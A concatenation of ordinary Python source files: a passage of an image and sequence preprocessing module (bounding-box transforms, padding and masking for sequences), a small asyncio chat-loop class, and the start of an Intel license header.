y = int(coord[1] * imh)
y2 = int(coord[3] * imh)
return [x, y, x2, y2]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
# tl.logging.info(coords)
# # [[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
# tl.logging.info(coords)
# # [[0.3, 0.8, 0.5, 1.0]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
# tl.logging.info(coords)
# # [[0.15, 0.4, 0.25, 0.5]]
# exit()
def obj_box_coord_centroid_to_upleft_butright(coord, to_int=False):
"""Convert one coordinate [x_center, y_center, w, h] to [x1, y1, x2, y2] in up-left and botton-right format.
Parameters
------------
coord : list of 4 int/float
One coordinate.
to_int : boolean
Whether to convert output as integer.
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
[20, 30, 40, 50]
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x_center, y_center, w, h = coord
x = x_center - w / 2.
y = y_center - h / 2.
x2 = x + w
y2 = y + h
if to_int:
return [int(x), int(y), int(x2), int(y2)]
else:
return [x, y, x2, y2]
# coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
# tl.logging.info(coord) [20, 30, 40, 50]
# exit()
def obj_box_coord_upleft_butright_to_centroid(coord):
"""Convert one coordinate [x1, y1, x2, y2] to [x_center, y_center, w, h].
It is the reverse process of ``obj_box_coord_centroid_to_upleft_butright``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x1, y1, x2, y2]")
x1, y1, x2, y2 = coord
w = x2 - x1
h = y2 - y1
x_c = x1 + w / 2.
y_c = y1 + h / 2.
return [x_c, y_c, w, h]
def obj_box_coord_centroid_to_upleft(coord):
"""Convert one coordinate [x_center, y_center, w, h] to [x, y, w, h].
It is the reverse process of ``obj_box_coord_upleft_to_centroid``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x_center, y_center, w, h = coord
x = x_center - w / 2.
y = y_center - h / 2.
return [x, y, w, h]
def obj_box_coord_upleft_to_centroid(coord):
"""Convert one coordinate [x, y, w, h] to [x_center, y_center, w, h].
It is the reverse process of ``obj_box_coord_centroid_to_upleft``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x, y, w, h = coord
x_center = x + w / 2.
y_center = y + h / 2.
return [x_center, y_center, w, h]
def parse_darknet_ann_str_to_list(annotations):
"""Input string format of class, x, y, w, h, return list of list format.
Parameters
-----------
annotations : str
The annotations in darkent format "class, x, y, w, h ...." seperated by "\\n".
Returns
-------
list of list of 4 numbers
List of bounding box.
"""
annotations = annotations.split("\n")
ann = []
for a in annotations:
a = a.split()
if len(a) == 5:
for i, _v in enumerate(a):
if i == 0:
a[i] = int(a[i])
else:
a[i] = float(a[i])
ann.append(a)
return ann
def parse_darknet_ann_list_to_cls_box(annotations):
"""Parse darknet annotation format into two lists for class and bounding box.
Input list of [[class, x, y, w, h], ...], return two list of [class ...] and [[x, y, w, h], ...].
Parameters
------------
annotations : list of list
A list of class and bounding boxes of images e.g. [[class, x, y, w, h], ...]
Returns
-------
list of int
List of class labels.
list of list of 4 numbers
List of bounding box.
"""
class_list = []
bbox_list = []
for ann in annotations:
class_list.append(ann[0])
bbox_list.append(ann[1:])
return class_list, bbox_list
def obj_box_horizontal_flip(im, coords=None, is_rescale=False, is_center=False, is_random=False):
"""Left-right flip the image and coordinates for object detection.
Parameters
----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
is_random : boolean
If True, randomly flip. Default is False.
Returns
-------
numpy.array
A processed image
list of list of 4 numbers
A list of new bounding boxes.
Examples
--------
>>> im = np.zeros([80, 100]) # as an image with shape width=100, height=80
>>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
>>> print(coords)
[[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
>>> print(coords)
[[0.5, 0.4, 0.3, 0.3]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
>>> print(coords)
[[80, 40, 30, 30]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
>>> print(coords)
[[50, 40, 30, 30]]
"""
if coords is None:
coords = []
def _flip(im, coords):
im = flip_axis(im, axis=1, is_random=False)
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
if is_center:
# x_center' = 1 - x
x = 1. - coord[0]
else:
# x_center' = 1 - x - w
x = 1. - coord[0] - coord[2]
else:
if is_center:
# x' = im.width - x
x = im.shape[1] - coord[0]
else:
# x' = im.width - x - w
x = im.shape[1] - coord[0] - coord[2]
coords_new.append([x, coord[1], coord[2], coord[3]])
return im, coords_new
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
return _flip(im, coords)
else:
return im, coords
else:
return _flip(im, coords)
obj_box_left_right_flip = obj_box_horizontal_flip
# im = np.zeros([80, 100]) # as an image with shape width=100, height=80
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[0.5, 0.4, 0.3, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[80, 40, 30, 30]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[50, 40, 30, 30]]
# exit()
def obj_box_imresize(im, coords=None, size=None, interp='bicubic', mode=None, is_rescale=False):
"""Resize an image, and compute the new bounding box coordinates.
Parameters
-------------
im : numpy.array
An image with dimension of [row, col, channel] (default).
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
size interp and mode : args
See ``tl.prepro.imresize``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1], then return the original coordinates. Default is False.
Returns
-------
numpy.array
A processed image
list of list of 4 numbers
A list of new bounding boxes.
Examples
--------
>>> im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
>>> print(coords)
[[40, 80, 60, 60], [20, 40, 40, 40]]
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
>>> print(coords)
[[20, 20, 30, 15]]
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
>>> print(coords)
[[30, 30, 45, 22]]
>>> im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
>>> print(coords, im2.shape)
[[0.2, 0.4, 0.3, 0.3]] (160, 200, 3)
"""
if coords is None:
coords = []
if size is None:
size = [100, 100]
imh, imw = im.shape[0:2]
imh = imh * 1.0 # * 1.0 for python2 : force division to be float point
imw = imw * 1.0
im = imresize(im, size=size, interp=interp, mode=mode)
if is_rescale is False:
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
# x' = x * (imw'/imw)
x = int(coord[0] * (size[1] / imw))
# y' = y * (imh'/imh)
# tl.logging.info('>>', coord[1], size[0], imh)
y = int(coord[1] * (size[0] / imh))
# w' = w * (imw'/imw)
w = int(coord[2] * (size[1] / imw))
# h' = h * (imh'/imh)
h = int(coord[3] * (size[0] / imh))
coords_new.append([x, y, w, h])
return im, coords_new
else:
return im, coords
# im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
# tl.logging.info(coords)
# # [[40, 80, 60, 60], [20, 40, 40, 40]]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
# tl.logging.info(coords)
# # [20, 20, 30, 15]
# _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
# tl.logging.info(coords)
# # [30, 30, 45, 22]
# im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
# tl.logging.info(coords, im2.shape)
# # [0.2, 0.4, 0.3, 0.3] (160, 200, 3)
# exit()
def obj_box_crop(
im, classes=None, coords=None, wrg=100, hrg=100, is_rescale=False, is_center=False, is_random=False,
thresh_wh=0.02, thresh_wh2=12.
):
"""Randomly or centrally crop an image, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
wrg hrg and is_random : args
See ``tl.prepro.crop``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean, default False
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
h, w = im.shape[0], im.shape[1]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
h_end = hrg + h_offset
w_end = wrg + w_offset
im_new = im[h_offset:h_end, w_offset:w_end]
else: # central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
h_end = h_offset + hrg
w_end = w_offset + wrg
im_new = im[h_offset:h_end, w_offset:w_end]
# w
# _____________________________
# | h/w offset |
# | ------- |
# h | | | |
# | | | |
# | ------- |
# | h/w end |
# |___________________________|
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
##======= pixel unit format and upleft, w, h ==========##
# x = np.clip( coord[0] - w_offset, 0, w_end - w_offset)
# y = np.clip( coord[1] - h_offset, 0, h_end - h_offset)
# w = np.clip( coord[2] , 0, w_end - w_offset)
# h = np.clip( coord[3] , 0, h_end - h_offset)
x = coord[0] - w_offset
y = coord[1] - h_offset
w = coord[2]
h = coord[3]
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
## convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def obj_box_shift(
im, classes=None, coords=None, wrg=0.1, hrg=0.1, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
"""Shift an image randomly or non-randomly, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
wrg, hrg row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.shift``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
imh, imw = im.shape[row_index], im.shape[col_index]
if (hrg >= 1.0) and (hrg <= 0.) and (wrg >= 1.0) and (wrg <= 0.):
raise AssertionError("shift range should be (0, 1)")
if is_random:
tx = np.random.uniform(-hrg, hrg) * imh
ty = np.random.uniform(-wrg, wrg) * imw
else:
tx, ty = hrg * imh, wrg * imw
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
# modified from obj_box_crop
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
##======= pixel unit format and upleft, w, h ==========##
x = coord[0] - ty # only change this
y = coord[1] - tx # only change this
w = coord[2]
h = coord[3]
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
## convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def obj_box_zoom(
im, classes=None, coords=None, zoom_range=(0.9,
1.1), row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
"""Zoom in and out of a single image, randomly or non-randomly, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
zoom_range row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.zoom``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid. (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes.
"""
if classes is None:
classes = []
if coords is None:
coords = []
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
# tl.logging.info(zx, zy)
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = im.shape[row_index], im.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
im_new = apply_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
# modified from obj_box_crop
def _get_coord(coord):
"""Input pixel-unit [x, y, w, h] format, then make sure [x, y] it is the up-left coordinates,
before getting the new coordinates.
Boxes outsides the cropped image will be removed.
"""
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
# ======= pixel unit format and upleft, w, h ==========
x = (coord[0] - im.shape[1] / 2) / zy + im.shape[1] / 2 # only change this
y = (coord[1] - im.shape[0] / 2) / zx + im.shape[0] / 2 # only change this
w = coord[2] / zy # only change this
h = coord[3] / zx # only change thisS
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]: # object outside the cropped image
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]: # object outside the cropped image
return None
if (x is not None) and (x + w > im_new.shape[1]): # box outside the cropped image
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]): # box outside the cropped image
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2): # object shape strange: too narrow
# tl.logging.info('xx', w, h)
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh): # object shape strange: too narrow
# tl.logging.info('yy', w, im_new.shape[1], h, im_new.shape[0])
return None
coord = [x, y, w, h]
# convert back if input format is center.
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
# for scaled coord, upscaled before process and scale back in the end.
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new
def pad_sequences(sequences, maxlen=None, dtype='int32', padding='post', truncating='pre', value=0.):
"""Pads each sequence to the same length:
the length of the longest sequence.
If maxlen is provided, any sequence longer
than maxlen is truncated to maxlen.
Truncation happens off either the beginning (default) or
the end of the sequence.
Supports post-padding and pre-padding (default).
Parameters
----------
sequences : list of list of int
All sequences where each row is a sequence.
maxlen : int
Maximum length.
dtype : numpy.dtype or str
Data type to cast the resulting sequence.
padding : str
Either 'pre' or 'post', pad either before or after each sequence.
truncating : str
Either 'pre' or 'post', remove values from sequences larger than maxlen either in the beginning or in the end of the sequence
value : float
Value to pad the sequences to the desired value.
Returns
----------
x : numpy.array
With dimensions (number_of_sequences, maxlen)
Examples
----------
>>> sequences = [[1,1,1,1,1],[2,2,2],[3,3]]
>>> sequences = pad_sequences(sequences, maxlen=None, dtype='int32',
... padding='post', truncating='pre', value=0.)
[[1 1 1 1 1]
[2 2 2 0 0]
[3 3 0 0 0]]
"""
lengths = [len(s) for s in sequences]
nb_samples = len(sequences)
if maxlen is None:
maxlen = np.max(lengths)
# take the sample shape from the first non empty sequence
# checking for consistency in the main loop below.
sample_shape = tuple()
for s in sequences:
if len(s) > 0:
sample_shape = np.asarray(s).shape[1:]
break
x = (np.ones((nb_samples, maxlen) + sample_shape) * value).astype(dtype)
for idx, s in enumerate(sequences):
if len(s) == 0:
continue # empty list was found
if truncating == 'pre':
trunc = s[-maxlen:]
elif truncating == 'post':
trunc = s[:maxlen]
else:
raise ValueError('Truncating type "%s" not understood' % truncating)
# check `trunc` has expected shape
trunc = np.asarray(trunc, dtype=dtype)
if trunc.shape[1:] != sample_shape:
raise ValueError(
'Shape of sample %s of sequence at position %s is different from expected shape %s' %
(trunc.shape[1:], idx, sample_shape)
)
if padding == 'post':
x[idx, :len(trunc)] = trunc
elif padding == 'pre':
x[idx, -len(trunc):] = trunc
else:
raise ValueError('Padding type "%s" not understood' % padding)
return x.tolist()
def remove_pad_sequences(sequences, pad_id=0):
"""Remove padding.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
pad_id : int
The pad ID.
Returns
----------
list of list of int
The processed sequences.
Examples
----------
>>> sequences = [[2,3,4,0,0], [5,1,2,3,4,0,0,0], [4,5,0,2,4,0,0,0]]
>>> print(remove_pad_sequences(sequences, pad_id=0))
[[2, 3, 4], [5, 1, 2, 3, 4], [4, 5, 0, 2, 4]]
"""
sequences_out = copy.deepcopy(sequences)
for i, _ in enumerate(sequences):
# for j in range(len(sequences[i])):
# if sequences[i][j] == pad_id:
# sequences_out[i] = sequences_out[i][:j]
# break
for j in range(1, len(sequences[i])):
if sequences[i][-j] != pad_id:
sequences_out[i] = sequences_out[i][0:-j + 1]
break
return sequences_out
def process_sequences(sequences, end_id=0, pad_val=0, is_shorten=True, remain_end_id=False):
"""Set all tokens(ids) after END token to the padding value, and then shorten (option) it to the maximum sequence length in this batch.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The special token for END.
pad_val : int
Replace the `end_id` and the IDs after `end_id` to this value.
is_shorten : boolean
Shorten the sequences. Default is True.
remain_end_id : boolean
Keep an `end_id` in the end. Default is False.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sentences_ids = [[4, 3, 5, 3, 2, 2, 2, 2], <-- end_id is 2
... [5, 3, 9, 4, 9, 2, 2, 3]] <-- end_id is 2
>>> sentences_ids = precess_sequences(sentences_ids, end_id=vocab.end_id, pad_val=0, is_shorten=True)
[[4, 3, 5, 3, 0], [5, 3, 9, 4, 9]]
"""
max_length = 0
for _, seq in enumerate(sequences):
is_end = False
for i_w, n in enumerate(seq):
if n == end_id and is_end == False: # 1st time to see end_id
is_end = True
if max_length < i_w:
max_length = i_w
if remain_end_id is False:
seq[i_w] = pad_val # set end_id to pad_val
elif is_end ==True:
seq[i_w] = pad_val
if remain_end_id is True:
max_length += 1
if is_shorten:
for i, seq in enumerate(sequences):
sequences[i] = seq[:max_length]
return sequences
def sequences_add_start_id(sequences, start_id=0, remove_last=False):
"""Add special start token(id) in the beginning of each sequence.
Parameters
------------
sequences : list of list of int
All sequences where each row is a sequence.
start_id : int
The start ID.
remove_last : boolean
Remove the last value of each sequences. Usually be used for removing the end ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sentences_ids = [[4,3,5,3,2,2,2,2], [5,3,9,4,9,2,2,3]]
>>> sentences_ids = sequences_add_start_id(sentences_ids, start_id=2)
[[2, 4, 3, 5, 3, 2, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2, 3]]
>>> sentences_ids = sequences_add_start_id(sentences_ids, start_id=2, remove_last=True)
[[2, 4, 3, 5, 3, 2, 2, 2], [2, 5, 3, 9, 4, 9, 2, 2]]
For Seq2seq
>>> input = [a, b, c]
>>> target = [x, y, z]
>>> decode_seq = [start_id, a, b] <-- sequences_add_start_id(input, start_id, True)
"""
sequences_out = [[] for _ in range(len(sequences))] #[[]] * len(sequences)
for i, _ in enumerate(sequences):
if remove_last:
sequences_out[i] = [start_id] + sequences[i][:-1]
else:
sequences_out[i] = [start_id] + sequences[i]
return sequences_out
def sequences_add_end_id(sequences, end_id=888):
"""Add special end token(id) in the end of each sequence.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The end ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sequences = [[1,2,3],[4,5,6,7]]
>>> print(sequences_add_end_id(sequences, end_id=999))
[[1, 2, 3, 999], [4, 5, 6, 999]]
"""
sequences_out = [[] for _ in range(len(sequences))] #[[]] * len(sequences)
for i, _ in enumerate(sequences):
sequences_out[i] = sequences[i] + [end_id]
return sequences_out
def sequences_add_end_id_after_pad(sequences, end_id=888, pad_id=0):
"""Add special end token(id) in the end of each sequence.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
end_id : int
The end ID.
pad_id : int
The pad ID.
Returns
----------
list of list of int
The processed sequences.
Examples
---------
>>> sequences = [[1,2,0,0], [1,2,3,0], [1,2,3,4]]
>>> print(sequences_add_end_id_after_pad(sequences, end_id=99, pad_id=0))
[[1, 2, 99, 0], [1, 2, 3, 99], [1, 2, 3, 4]]
"""
# sequences_out = [[] for _ in range(len(sequences))]#[[]] * len(sequences)
sequences_out = copy.deepcopy(sequences)
# # add a pad to all
# for i in range(len(sequences)):
# for j in range(len(sequences[i])):
# sequences_out[i].append(pad_id)
# # pad -- > end
# max_len = 0
for i, v in enumerate(sequences):
for j, _v2 in enumerate(v):
if sequences[i][j] == pad_id:
sequences_out[i][j] = end_id
# if j > max_len:
# max_len = j
break
# # remove pad if too long
# for i in range(len(sequences)):
# for j in range(len(sequences[i])):
# sequences_out[i] = sequences_out[i][:max_len+1]
return sequences_out
def sequences_get_mask(sequences, pad_val=0):
"""Return mask for sequences.
Parameters
-----------
sequences : list of list of int
All sequences where each row is a sequence.
pad_val : int
The pad value.
Returns
----------
list of list of int
The mask.
Examples
---------
>>> sentences_ids = [[4, 0, 5, 3, 0, 0],
... [5, 3, 9, 4, 9, 0]]
>>> mask = sequences_get_mask(sentences_ids, pad_val=0)
[[1 1 1 1 0 0]
[1 1 1 1 1 0]]
"""
mask = np.ones_like(sequences)
for i, seq in enumerate(sequences):
for i_w in reversed(range(len(seq))):
if seq[i_w] == pad_val:
mask[i, i_w] = 0
else:
break # <-- exit the for loop, prepcess next sequence
return mask
|
loop.py | import os
import asyncio
import threading
from . import session
class ChatLoop(object):
"""
Responsible for creating an `asyncio` event loop in a background thread
that chat sessions can share and for creating new chat sessions connected
to that thread and event loop.
"""
def __init__(self, host=None, port=None):
self.__host = host
self.__port = port
# Flask integration -- see app/__init__.py
def init_app(self, app):
self.init(app.config['CHAT_HOST'], app.config['CHAT_PORT'])
def init(self, host, port):
self.__host = host
self.__port = port
def init_from_env(self):
self.init(os.environ['CHAT_HOST'], os.environ['CHAT_PORT'])
def __run_event_loop(self):
""" Runs in a background thread """
asyncio.set_event_loop(self.__loop)
self.__loop.run_forever()
__loop = None
__new_session_lock = threading.Lock()
__thread = None
def new_session(self) -> session.ChatSession:
"""
Open a new session connected to the chat server using
connection details provided at initialization time.
"""
# On the first time, start the background thread and event loop
with self.__new_session_lock:
if self.__loop is None:
self.__loop = asyncio.new_event_loop()
self.__thread = threading.Thread(target=self.__run_event_loop)
self.__thread.start()
# Return a new session
s = session.ChatSession(
self.__host,
self.__port,
self.__loop)
return s
def stop(self):
if self.__loop is not None:
self.__loop.call_soon_threadsafe(self.__loop.stop)
if self.__thread is not None:
self.__thread.join() |
Misc.py | ## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
